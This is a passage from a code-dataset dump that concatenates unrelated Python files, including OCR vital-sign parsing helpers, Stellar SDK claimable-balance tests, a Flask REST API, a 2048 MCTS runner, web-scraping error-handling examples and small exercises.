:param psm:\n :param image: image to parse text from\n :return:\n \"\"\"\n grayscale_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n big_img = cv2.resize(grayscale_img, None, fx=2, fy=2, interpolation=cv2.INTER_CUBIC)\n tess_result = pytesseract.image_to_string(Image.fromarray(big_img), config='--psm {}'.format(psm))\n\n if DEBUG:\n print(\"Identified String: \\n{}\\n ------------ \".format(tess_result))\n return tess_result\n\n\ndef apply_erode_filter(t, iterations, kernel):\n \"\"\"\n Apply erode filter to the image.\n :param t:\n :param iterations: Number of erode iterations\n :param kernel: size of erode kernel\n :return:\n \"\"\"\n b_w_img = cv2.cvtColor(t, cv2.COLOR_BGR2GRAY)\n ret, thresh = cv2.threshold(b_w_img, 127, 255, cv2.THRESH_BINARY)\n kernel = np.ones((kernel, kernel), np.uint8)\n img = cv2.erode(thresh, kernel, iterations=iterations)\n return img\n\n\ndef create_image_array(x_coordinates, y_coordinates, image):\n \"\"\"\n divide an image in array of images [[img, img, img, img],\n [img, img, img, img],\n [img, img, img, img]]\n arrays are oriented along the y axis.\n i.e. images is divided in array from top to bottom,\n then to the next x coordinate and again divided from top to bottom\n\n :param x_coordinates:\n :param y_coordinates:\n :param image:\n :return:\n \"\"\"\n array_of_array_of_images = []\n for x in range(len(x_coordinates) - 1):\n array_of_images = []\n for y in range(len(y_coordinates) - 1):\n img = image[y_coordinates[y]:y_coordinates[y + 1], x_coordinates[x]:x_coordinates[x + 1]]\n array_of_images.append(img)\n array_of_array_of_images.append(array_of_images)\n return array_of_array_of_images\n\n\ndef show_image(img, title=\"Image\"):\n cv2.imshow(title, img)\n if IMG_SHOT_WAIT:\n cv2.waitKey(200)\n else:\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef create_demographic_dict_structure(header, value):\n \"\"\"\n\n :param header:\n :param value:\n :return:\n \"\"\"\n d = {\"type\": \"demographics\", 'data': {}}\n d['data']['prop'] = header\n d['data']['value'] = value\n return d\n\n\ndef manage_keys(header, dict_of_headers):\n \"\"\"\n Checks if header is convertable in\n :param header:\n :param dict_of_headers:\n :return:\n \"\"\"\n # print(\"Header being searched: {}\".format(header))\n if header.strip() in dict_of_headers.keys():\n return dict_of_headers[header.strip()]\n else:\n return None\n\n\ndef create_dictionary(header, value, ts):\n \"\"\"\n Create a dictionary acceptable by the core.\n\n :param header:\n :param value:\n :param ts:\n :return: If time stamp check passes, Dictionary otherwise None\n \"\"\"\n # print(\"Header: {} Valye: {} ts : {}\".format(header, value, ts))\n\n # This is pretty hacky but will work for now\n # Leave blood pressure and temp values raw for now. Convert all others to float\n # or return if no float (shouldn't ever happen)\n if header.lower() not in {'temp', 'blood pressure'}:\n re_result = float_regex.search(value)\n if not re_result:\n return\n value = re_result[0]\n measurement_dict = {\"type\": \"measurement\", 'data': {}}\n measurement_dict['data']['mmt'] = header\n measurement_dict['data']['rt'] = datetime.utcnow()\n measurement_dict['data']['val'] = value\n if type({}) == type(ts):\n try:\n # print(ts)\n parsed_time = datetime(year=ts['year'],\n month=ts['month'],\n day=ts['day'],\n hour=ts['hour'],\n minute=ts['minute'])\n\n measurement_dict['data']['ts'] = parsed_time\n # print(\"Inside create dict: {}\".format(measurement_dict))\n return measurement_dict\n except:\n return None\n else:\n measurement_dict['data']['ts'] = ts\n\n return measurement_dict\n\n\ndef manage_special_keys(data):\n \"\"\"\n Manage temp and blood pressure keys\n :param data:\n :return:\n \"\"\"\n if data['data']['mmt'].lower() == 'temp' and data['data']['val'] is not \"\":\n # Make sure we just have the float value\n re_result = float_regex.search(data['data']['val'])\n data['data']['val'] = round((float(re_result[0]) - 32) * 5 / 9, 2)\n return data\n elif data['data']['mmt'].lower() == 'blood pressure':\n if data['data']['val'] is not \"\" and \"/\" in data['data']['val']:\n split_val = data['data']['val'].split('/')\n ret = [create_dictionary('SysABP', split_val[0], data['data']['ts']),\n create_dictionary('DiasABP', split_val[1], data['data']['ts'])]\n return ret\n else:\n return data\n\n\ndef create_measurement_dict_structure(header, value, ts, dict_of_acceptable_keys):\n \"\"\"\n convert parsed strings to dictionary structure acceptable by the controller\n :param dict_of_acceptable_keys:\n :param header:\n :param value:\n :param ts:\n :return:\n \"\"\"\n if DEBUG:\n print(\"Incoming values : Header : {} \\nValue: {} \\nTs: :{}\".format(header, value, ts))\n\n # Check if header is acceptable i.e. its in the dictionary\n header_val_for_database = manage_keys(header, dict_of_acceptable_keys)\n if header_val_for_database is None:\n if DEBUG:\n print(\"Key {} not found in provided dict_for_acceptable_keys\".format(header))\n return None\n\n # Check all values are provided\n if header is None or value is None or ts is None:\n if DEBUG:\n print(\"None Value provided: \\nHeader: {}\\nValue: {}\\nTS: {}\".format(header, value, ts))\n return None\n\n # Make sure there is at least one float in the value (to accomodate Blood Pressure)\n re_result = float_regex.search(value)\n if not re_result:\n return None\n \n # Create a dictionary that can be submitted to the controller\n measurement_dict = create_dictionary(header_val_for_database, value, ts)\n if measurement_dict is None:\n if DEBUG:\n print(f'{header_val_for_database} and {value} resulted in None')\n return None\n # Manage keys that need changes to values. i.e. Temp and BP\n\n measurement_dict = manage_special_keys(measurement_dict)\n if type(measurement_dict) is type([]):\n return measurement_dict\n else:\n return [measurement_dict]\n","repo_name":"jamycoder34/Data-Science","sub_path":"helpers/helper_methods.py","file_name":"helper_methods.py","file_ext":"py","file_size_in_byte":17133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33699037626","text":"from decimal import Decimal\n\nimport pytest\n\nfrom stellar_sdk import Claimant, ClaimPredicate, CreateClaimableBalance, Operation\nfrom stellar_sdk.xdr.claim_predicate import ClaimPredicate as XdrClaimPredicate\n\nfrom . import *\n\n\nclass TestCreateClaimableBalance:\n @pytest.mark.parametrize(\n \"amount, source, xdr\",\n [\n pytest.param(\n \"100\",\n None,\n \"AAAAAAAAAA4AAAABVVNEAAAAAACbjrr4ljhVHc+epPdDIHEQa4erDi2z1pt1pTgicvdZ2AAAAAA7msoAAAAAAwAAAAAAAAAAiZsoQO1WNsVt3F8Usjl1958bojiNJpTkxW7N3clg5e8AAAABAAAAAgAAAAEAAAACAAAABAAAAABfXhAAAAAAAAAAAAIAAAACAAAABQAAAAAAAMNQAAAAAwAAAAEAAAAEAAAAAGVT8QAAAAAAAAAAAGMovsAmvK7LPSwaKH87rbUPu+L3M6626b2Xw4TS/+/xAAAAAAAAAAAAAAAArmMiJMPI1s9rwWI+o1IYFlszbVKWiA9jYn22L63ZTccAAAAEAAAAAF9zSqI=\",\n id=\"without_source\",\n ),\n pytest.param(\n \"100\",\n kp1.public_key,\n \"AAAAAQAAAABiXz1Zw/ieWRoG2l4IxdbkvfDRUDq5wyKBSUnrCR5doQAAAA4AAAABVVNEAAAAAACbjrr4ljhVHc+epPdDIHEQa4erDi2z1pt1pTgicvdZ2AAAAAA7msoAAAAAAwAAAAAAAAAAiZsoQO1WNsVt3F8Usjl1958bojiNJpTkxW7N3clg5e8AAAABAAAAAgAAAAEAAAACAAAABAAAAABfXhAAAAAAAAAAAAIAAAACAAAABQAAAAAAAMNQAAAAAwAAAAEAAAAEAAAAAGVT8QAAAAAAAAAAAGMovsAmvK7LPSwaKH87rbUPu+L3M6626b2Xw4TS/+/xAAAAAAAAAAAAAAAArmMiJMPI1s9rwWI+o1IYFlszbVKWiA9jYn22L63ZTccAAAAEAAAAAF9zSqI=\",\n id=\"with_source_public_key\",\n ),\n pytest.param(\n \"100\",\n muxed1,\n \"AAAAAQAAAQAAAAAAAAAAAWJfPVnD+J5ZGgbaXgjF1uS98NFQOrnDIoFJSesJHl2hAAAADgAAAAFVU0QAAAAAAJuOuviWOFUdz56k90MgcRBrh6sOLbPWm3WlOCJy91nYAAAAADuaygAAAAADAAAAAAAAAACJmyhA7VY2xW3cXxSyOXX3nxuiOI0mlOTFbs3dyWDl7wAAAAEAAAACAAAAAQAAAAIAAAAEAAAAAF9eEAAAAAAAAAAAAgAAAAIAAAAFAAAAAAAAw1AAAAADAAAAAQAAAAQAAAAAZVPxAAAAAAAAAAAAYyi+wCa8rss9LBoofzuttQ+74vczrrbpvZfDhNL/7/EAAAAAAAAAAAAAAACuYyIkw8jWz2vBYj6jUhgWWzNtUpaID2NifbYvrdlNxwAAAAQAAAAAX3NKog==\",\n id=\"with_source_muxed_account\",\n ),\n pytest.param(\n \"100\",\n muxed1.account_muxed,\n \"AAAAAQAAAQAAAAAAAAAAAWJfPVnD+J5ZGgbaXgjF1uS98NFQOrnDIoFJSesJHl2hAAAADgAAAAFVU0QAAAAAAJuOuviWOFUdz56k90MgcRBrh6sOLbPWm3WlOCJy91nYAAAAADuaygAAAAADAAAAAAAAAACJmyhA7VY2xW3cXxSyOXX3nxuiOI0mlOTFbs3dyWDl7wAAAAEAAAACAAAAAQAAAAIAAAAEAAAAAF9eEAAAAAAAAAAAAgAAAAIAAAAFAAAAAAAAw1AAAAADAAAAAQAAAAQAAAAAZVPxAAAAAAAAAAAAYyi+wCa8rss9LBoofzuttQ+74vczrrbpvZfDhNL/7/EAAAAAAAAAAAAAAACuYyIkw8jWz2vBYj6jUhgWWzNtUpaID2NifbYvrdlNxwAAAAQAAAAAX3NKog==\",\n id=\"with_source_muxed_account_strkey\",\n ),\n pytest.param(\n Decimal(\"100\"),\n kp1.public_key,\n \"AAAAAQAAAABiXz1Zw/ieWRoG2l4IxdbkvfDRUDq5wyKBSUnrCR5doQAAAA4AAAABVVNEAAAAAACbjrr4ljhVHc+epPdDIHEQa4erDi2z1pt1pTgicvdZ2AAAAAA7msoAAAAAAwAAAAAAAAAAiZsoQO1WNsVt3F8Usjl1958bojiNJpTkxW7N3clg5e8AAAABAAAAAgAAAAEAAAACAAAABAAAAABfXhAAAAAAAAAAAAIAAAACAAAABQAAAAAAAMNQAAAAAwAAAAEAAAAEAAAAAGVT8QAAAAAAAAAAAGMovsAmvK7LPSwaKH87rbUPu+L3M6626b2Xw4TS/+/xAAAAAAAAAAAAAAAArmMiJMPI1s9rwWI+o1IYFlszbVKWiA9jYn22L63ZTccAAAAEAAAAAF9zSqI=\",\n id=\"starting_balance_decimal\",\n ),\n ],\n )\n def test_xdr(self, amount, source, xdr):\n predicate_left = ClaimPredicate.predicate_and(\n ClaimPredicate.predicate_before_absolute_time(1600000000),\n ClaimPredicate.predicate_unconditional(),\n )\n predicate_right = ClaimPredicate.predicate_or(\n ClaimPredicate.predicate_before_relative_time(50000),\n ClaimPredicate.predicate_not(\n ClaimPredicate.predicate_before_absolute_time(1700000000)\n ),\n )\n predicate1 = ClaimPredicate.predicate_and(predicate_left, predicate_right)\n claimant1 = Claimant(\n destination=\"GCEZWKCA5VLDNRLN3RPRJMRZOX3Z6G5CHCGSNFHEYVXM3XOJMDS674JZ\",\n predicate=predicate1,\n )\n\n predicate2 = ClaimPredicate.predicate_unconditional()\n claimant2 = Claimant(\n destination=\"GBRSRPWAE26K5SZ5FQNCQ7Z3VW2Q7O7C64Z25NXJXWL4HBGS77X7CWTG\",\n predicate=predicate2,\n )\n\n predicate3 = ClaimPredicate.predicate_before_absolute_time(1601391266)\n claimant3 = Claimant(\n destination=\"GCXGGIREYPENNT3LYFRD5I2SDALFWM3NKKLIQD3DMJ63ML5N3FG4OQQG\",\n predicate=predicate3,\n )\n claimants = [claimant1, claimant2, claimant3]\n op = CreateClaimableBalance(\n asset=asset1,\n amount=amount,\n claimants=claimants,\n source=source,\n )\n\n assert op.asset == asset1\n assert op.amount == str(amount)\n assert op.claimants == claimants\n check_source(op.source, source)\n xdr_object = op.to_xdr_object()\n assert xdr_object.to_xdr() == xdr\n assert Operation.from_xdr_object(xdr_object) == op\n\n def test_invalid_amount_raise(self):\n amount = \"12345678902.23423324\"\n claimants = [\n Claimant(\n destination=kp2.public_key,\n predicate=ClaimPredicate.predicate_unconditional(),\n )\n ]\n with pytest.raises(\n ValueError,\n match=f'Value of argument \"amount\" must have at most 7 digits after the decimal: {amount}',\n ):\n CreateClaimableBalance(asset1, amount, claimants, kp1.public_key)\n\n\nclass TestClaimPredicate:\n @staticmethod\n def to_xdr(predicate):\n return predicate.to_xdr_object().to_xdr()\n\n def test_predicate_unconditional(self):\n xdr = \"AAAAAA==\"\n predicate = ClaimPredicate.predicate_unconditional()\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_before_relative_time(self):\n xdr = \"AAAABQAAAAAAAAPo\"\n predicate = ClaimPredicate.predicate_before_relative_time(1000)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_before_absolute_time(self):\n xdr = \"AAAABAAAAABfc0qi\"\n predicate = ClaimPredicate.predicate_before_absolute_time(1601391266)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_not(self):\n xdr = \"AAAAAwAAAAEAAAAEAAAAAF9zSqI=\"\n predicate_abs = ClaimPredicate.predicate_before_absolute_time(1601391266)\n predicate = ClaimPredicate.predicate_not(predicate_abs)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_and_1(self):\n xdr = \"AAAAAQAAAAIAAAAEAAAAAF9zSqIAAAAFAAAAAAAAA+g=\"\n predicate_abs = ClaimPredicate.predicate_before_absolute_time(1601391266)\n predicate_rel = ClaimPredicate.predicate_before_relative_time(1000)\n predicate = ClaimPredicate.predicate_and(predicate_abs, predicate_rel)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_and_2(self):\n xdr = \"AAAAAQAAAAIAAAAFAAAAAAAAA+gAAAAEAAAAAF9zSqI=\"\n predicate_abs = ClaimPredicate.predicate_before_absolute_time(1601391266)\n predicate_rel = ClaimPredicate.predicate_before_relative_time(1000)\n predicate = ClaimPredicate.predicate_and(predicate_rel, predicate_abs)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_or_1(self):\n xdr = \"AAAAAgAAAAIAAAAEAAAAAF9zSqIAAAAFAAAAAAAAA+g=\"\n predicate_abs = ClaimPredicate.predicate_before_absolute_time(1601391266)\n predicate_rel = ClaimPredicate.predicate_before_relative_time(1000)\n predicate = ClaimPredicate.predicate_or(predicate_abs, predicate_rel)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_or_2(self):\n xdr = \"AAAAAgAAAAIAAAAFAAAAAAAAA+gAAAAEAAAAAF9zSqI=\"\n predicate_abs = ClaimPredicate.predicate_before_absolute_time(1601391266)\n predicate_rel = ClaimPredicate.predicate_before_relative_time(1000)\n predicate = ClaimPredicate.predicate_or(predicate_rel, predicate_abs)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_mix(self):\n xdr = \"AAAAAQAAAAIAAAABAAAAAgAAAAQAAAAAX14QAAAAAAAAAAACAAAAAgAAAAUAAAAAAADDUAAAAAMAAAABAAAABAAAAABlU/EA\"\n predicate_left = ClaimPredicate.predicate_and(\n ClaimPredicate.predicate_before_absolute_time(1600000000),\n ClaimPredicate.predicate_unconditional(),\n )\n predicate_right = ClaimPredicate.predicate_or(\n ClaimPredicate.predicate_before_relative_time(50000),\n ClaimPredicate.predicate_not(\n ClaimPredicate.predicate_before_absolute_time(1700000000)\n ),\n )\n predicate = ClaimPredicate.predicate_and(predicate_left, predicate_right)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n\nclass TestClaimant:\n @staticmethod\n def to_xdr(claimant):\n return claimant.to_xdr_object().to_xdr()\n\n def test_claimant(self):\n xdr = \"AAAAAAAAAACJmyhA7VY2xW3cXxSyOXX3nxuiOI0mlOTFbs3dyWDl7wAAAAEAAAACAAAAAQAAAAIAAAAEAAAAAF9eEAAAAAAAAAAAAgAAAAIAAAAFAAAAAAAAw1AAAAADAAAAAQAAAAQAAAAAZVPxAA==\"\n destination = \"GCEZWKCA5VLDNRLN3RPRJMRZOX3Z6G5CHCGSNFHEYVXM3XOJMDS674JZ\"\n predicate_left = ClaimPredicate.predicate_and(\n ClaimPredicate.predicate_before_absolute_time(1600000000),\n ClaimPredicate.predicate_unconditional(),\n )\n predicate_right = ClaimPredicate.predicate_or(\n ClaimPredicate.predicate_before_relative_time(50000),\n ClaimPredicate.predicate_not(\n ClaimPredicate.predicate_before_absolute_time(1700000000)\n ),\n )\n predicate = ClaimPredicate.predicate_and(predicate_left, predicate_right)\n claimant = Claimant(destination=destination, predicate=predicate)\n assert self.to_xdr(claimant) == xdr\n assert claimant == Claimant.from_xdr_object(claimant.to_xdr_object())\n\n def test_claimant_default(self):\n xdr = \"AAAAAAAAAACJmyhA7VY2xW3cXxSyOXX3nxuiOI0mlOTFbs3dyWDl7wAAAAA=\"\n destination = \"GCEZWKCA5VLDNRLN3RPRJMRZOX3Z6G5CHCGSNFHEYVXM3XOJMDS674JZ\"\n claimant = Claimant(destination=destination)\n assert self.to_xdr(claimant) == xdr\n assert claimant == Claimant.from_xdr_object(claimant.to_xdr_object())\n\n def test_invalid_destination_raise(self):\n key = \"GCEZWKCA5VLDNRLN3RPRJMRZOX3Z6G5CHCGSNFHEYVXM3XOJMINVALID\"\n with pytest.raises(\n ValueError,\n match=f'Value of argument \"destination\" is not a valid ed25519 public key: {key}',\n ):\n Claimant(destination=key)\n","repo_name":"StellarCN/py-stellar-base","sub_path":"tests/operation/test_create_claimable_balance.py","file_name":"test_create_claimable_balance.py","file_ext":"py","file_size_in_byte":11560,"program_lang":"python","lang":"en","doc_type":"code","stars":335,"dataset":"github-code","pt":"31"} +{"seq_id":"1673896209","text":"#########################################################################################################\n# Nom du script : Save_Blob_Azure_Script.py #\n# Auteur : Mathieu Fabri #\n# Date de création : 2020-04 #\n# Version : 1.0 #\n# Langage : Python #\n# Description : Script pour sauvegarder les fichiers sur Azure Blob #\n# License : GPL3 - https://github.com/Altins752/Save_Blob_Azure_Script/blob/main/LICENSE #\n# GitHub : https://github.com/Altins752/Save_Blob_Azure_Script #\n#########################################################################################################\n\n#!/usr/bin/python3\nimport os, time\nfrom datetime import datetime, timedelta, date\n\n# fonction pour créer des noms de fichiers avec la date du jours\ndef fileCreate(prefixe, exten):\n comment_date = date.today() - timedelta(days=0)\n filename = f\"{prefixe}-{comment_date}.{exten}\"\n return filename\n\n# fonction pour créer des noms de fichiers avec le nombre de jours configurer en rétention (utile pour supprimer les anciens fichiers)\ndef fileDelete(prefixe, exten, jrs):\n comment_date = date.today() - timedelta(days=jrs)\n filename = f\"{prefixe}-{comment_date}.{exten}\"\n return filename\n\n\n\n","repo_name":"Altins752/Save_Blob_Azure_Script","sub_path":"fileName.py","file_name":"fileName.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4295798862","text":"frase=str(input('Digite uma frase:')).strip().upper()\npalavras=frase.split()\njunto=''.join(palavras)\ninverso= junto[::-1]\n#inverso='' (Usando o for)\n#for letra in range(len(junto) -1,-1,-1):\n #inverso += junto[letra]\nprint(f'O inverso de \\033[33m{junto}\\033[m é \\033[32m{inverso}\\033[m')\nif inverso==junto:\n print('Temos um \\033[34mPALÍNDROMO!\\033[m')\nelse:\n print('A frase digitada \\033[31mNÃO É UM PALÍNDROMO!\\033[m')\n","repo_name":"carlos09v/Mini-Projects_Exercises","sub_path":"Python/CursoEmVideo/Mundo 2/Exercícios/ex053--.py","file_name":"ex053--.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7629548232","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom flask import Flask\n\nfrom recursos.Coches import coches_api, Coche\nfrom recursos.Averias import averias_api, Averia\nfrom recursos.Clientes import clientes_api, Cliente\nfrom recursos.Mecanicos import mecanicos_api, Mecanico\n\nfrom flask.json import JSONEncoder\n\nclass MyJSONEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, Averia):\n return {\n 'idAveria': obj.idAveria,\n 'descripcion': obj.descripcion,\n 'coche': obj.coche\n }\n if isinstance(obj, Coche):\n \t return {\n \t'idCoche': obj.idCoche,\n\t\t\t\t\t'matricula': obj.matricula,\n\t\t\t\t\t'marca': obj.marca,\n\t\t\t\t\t'fechaFabricacion': obj.fechaFabricacion,\n\t\t\t\t\t'tipoAveria': obj.tipoAveria\n \t }\n if isinstance(obj, Cliente):\n return {\n\t\t\t\t\t'idCliente':obj.idCliente,\n \t'nombre': obj.nombre,\n\t\t\t\t\t'domicilio': obj.domicilio,\n 'fechaNacimiento': obj.fechaNacimiento\n \t\t }\n if isinstance(obj, Mecanico):\n return{\n 'idMecanico': obj.idMecanico,\n 'nombre': obj.nombre,\n }\n return super(MyJSONEncoder, self).default(obj)\n\napp = Flask(__name__)\napp.json_encoder = MyJSONEncoder\n\n# Blueprint\napp.register_blueprint(averias_api)\napp.register_blueprint(coches_api)\napp.register_blueprint(clientes_api)\napp.register_blueprint(mecanicos_api)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"sagzain/API-REST","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20569026404","text":"from uuid import uuid4\nfrom sys import argv\nfrom os import makedirs\nfrom os.path import exists\nfrom datetime import datetime\nfrom pandas import read_csv, DataFrame\nfrom alive_progress import alive_bar\nfrom tqdm import tqdm\n\njoinList = list()\ncreatedAtList = list()\nstateName = argv[1]\ncsvFile = './resources/join/{}_join.csv'.format(stateName)\n\n\njoinData = DataFrame(read_csv(csvFile))\ndatetimeAt: datetime = datetime.now()\nuuid: uuid4 = uuid4()\n\ncreatedAtList.append(\n \"\"\"\n insert into datetime_at(id, created_at, updated_at)\n value(UUID_TO_BIN('{}'), '{}', '{}');\n \"\"\".format(\n uuid,\n datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n )\n)\n\nwith alive_bar(len(joinData.index)) as bar:\n for index, value in joinData.iterrows():\n if (0 < (datetime.now() - datetimeAt).seconds):\n uuid = uuid4()\n datetimeAt = datetime.now()\n createdAtList.append(\n \"\"\"\n insert into datetime_at(id, created_at, updated_at)\n value(UUID_TO_BIN('{}'), '{}', '{}');\n \"\"\".format(\n uuid,\n datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n )\n )\n\n joinList.append(\n \"\"\"\n insert into catalog_postal_codes(\n id,\n state_id,\n municipality_id,\n settlement_id,\n city_id,\n postal_code_id, zone_id,\n settlement_type_id, datetime_id\n )\n values(\n UUID_TO_BIN('{}'),\n UUID_TO_BIN('{}'),\n UUID_TO_BIN('{}'),\n UUID_TO_BIN('{}'),\n UUID_TO_BIN('{}'),UUID_TO_BIN('{}'),UUID_TO_BIN('{}'),UUID_TO_BIN('{}'),UUID_TO_BIN('{}'));\n \"\"\".format(\n value.id,\n value.state_id,\n value.municipality_id,\n value.settlement_id,\n value.city_id,\n value.postal_code_id,\n value.zone_id,\n value.settlement_type_id,\n uuid\n )\n )\n\ndirectory = './resources/sql/{}'.format(stateName)\n\nif not exists(directory):\n makedirs(directory)\n\nwith open(\n './resources/sql/{}/createdAt_{}.sql'.format(\n stateName, stateName\n ), 'a+'\n) as createdFile:\n for row in tqdm(createdAtList):\n createdFile.write(row)\n\nwith open(\n './resources/sql/{}/postalCodeJoin_{}.sql'.format(\n stateName, stateName\n ), 'a+'\n) as joinFile:\n for row in tqdm(joinList):\n joinFile.write(row)\n","repo_name":"uetiko/commandsPython","sub_path":"join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30986656831","text":"class EntradaTiendasBebidas:\n\n def __init__(self, menor):\n self.menor = menor\n self._edad = False\n\n @property\n def edad (self):\n return self._edad \n\n @edad.setter\n def set_edad(self, mayor):\n if mayor is True:\n self._edad = True\n else:\n raise ValueError(\"Para comprar en la tienda se necesita tener 18 años y el comprador es menor\")\n\n\ncliente = EntradaTiendasBebidas(False)\nprint(cliente.edad)\ncliente.set_edad = True\nprint(cliente.set_edad)","repo_name":"XavierCarrera/Catalogo-de-Bebidas","sub_path":"CompradorBebidas.py","file_name":"CompradorBebidas.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29959773451","text":"import os\nimport copy\nimport random\nimport platform, multiprocessing\nfrom fire import Fire\nfrom Game2048Env import Game2048Env\n\ndef main(seed=0, gamma=0.99, c=100, iter_time=1, d=10, render=True):\n if platform.system() == 'Darwin':\n multiprocessing.set_start_method('spawn')\n\n env = Game2048Env(render) \n # you can fix the seed for debugging, but your agent SHOULD NOT overfit to the env of a certain seed\n env.seed(seed)\n # render is automatically set to False for copied envs\n # remember to call reset() before calling step()\n obs = env.reset()\n obs, rew, done, info = env.step(0)\n done = False\n\n from agent import MCTSAgent \n\n while not done:\n # copy the observation for simulate \n agent = MCTSAgent(env, gamma=gamma, c=c, iter_time=iter_time)\n obs = copy.deepcopy(obs)\n\n # select an action\n action = agent.select_action(obs, d)\n obs_new, rew, done, info = env.step(action)\n\n # if freeze at the state the select a random action\n if obs_new == obs:\n action = random.randint(0, 3)\n obs_new, rew, done, info = env.step(action)\n print('select a random action: {}'.format(action))\n\n print('state: \\n{}'.format(str(obs).replace('], [', '\\n').replace(', ', '\\t').replace('[', '').replace(']', '')))\n print('do action: {}'.format(['up', 'down', 'left', 'right'][action]))\n print('obtain reward: {}'.format(rew))\n print('done: {}'.format(done))\n print('info: {}\\n'.format(info))\n\n # reset the observation\n obs = obs_new\n \n print('#' * 70)\n print('game done, final score: {}\\n\\n'.format(env.score))\n\n # remember to close the env, but you can always let resources leak on your own computer :|\n env.close()\n\nif __name__ == '__main__':\n Fire(main)","repo_name":"AnnyTerfect/MCTS-2048","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"12095701263","text":"############################################################\r\n# #\r\n# block 1 #\r\n# #\r\n############################################################\r\n\r\n# from urllib.error import HTTPError # 检查http程序是否正确运行\r\n# from urllib.request import urlopen # 查找python中的request模块,导入urllib函数\r\n#\r\n# try:\r\n# html = urlopen('http://www.pythonscraping.com/pages/page1.html')\r\n# except HTTPError as e:\r\n# print(e) # 返回空值,中断程序,或者执行另一种方案\r\n# else:\r\n# print(404)\r\n\r\n############################################################\r\n# #\r\n# block 2 #\r\n# #\r\n############################################################\r\n\r\n# from urllib.request import urlopen # 查找python中的request模块,导入urllib函数\r\n# from urllib.error import HTTPError # 检查http程序是否正确运行\r\n# from urllib.error import URLError # 用来检查http的链接是否畅通可行,决定是否报错\r\n#\r\n# try:\r\n# html = urlopen(\"https://pythonscrapingthisurldoesnotexist.com\")\r\n# except HTTPError as e:\r\n# print(\"The server returned an HTTP error\")\r\n# except URLError as e:\r\n# print(\"The server could not be found!\") # 服务器不存在\r\n# else:\r\n# print(html.read())\r\n\r\n\r\n############################################################\r\n# #\r\n# block 3 #\r\n# #\r\n############################################################\r\n\r\nfrom urllib.request import urlopen\r\nfrom urllib.error import HTTPError\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\ndef getTitle(url): #定义getTitle的处理方法\r\n try:\r\n html = urlopen(url)\r\n except HTTPError as e:\r\n return None\r\n try:\r\n bsObj = BeautifulSoup(html.read(), \"lxml\")\r\n title = bsObj.body.h1\r\n except AttributeError as e:\r\n return None\r\n return title\r\n\r\n\r\ntitle = getTitle(\"http://www.pythonscraping.com/pages/page1.html\")\r\nif title == None:\r\n print(\"Title could not be found\")\r\nelse:\r\n print(title)","repo_name":"akenoshi/Python","sub_path":"Section-01/1.3-error.py","file_name":"1.3-error.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16067965081","text":"import numpy as np\nfrom sklearn.ensemble import IsolationForest\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport torch\nfrom models import RMSLELoss, Net\ndef clean_data(train_set_panda):\n \"\"\"\n Take a panda dataframe and convert all categorical values to numerical\n - fill nan values with the mean values in numerical columns \n - drop 4 columns due to nan:\n \"\"\"\n \n for clm in train_set_panda.columns:\n # check if it is a categorical values\n if train_set_panda[clm].dtype.name == 'object':\n cat_vals = train_set_panda[clm].unique()\n numerical_vals = [i for i in range(1,len(cat_vals)+1)]\n # replace categorical variable with numerical \n train_set_panda[clm] = 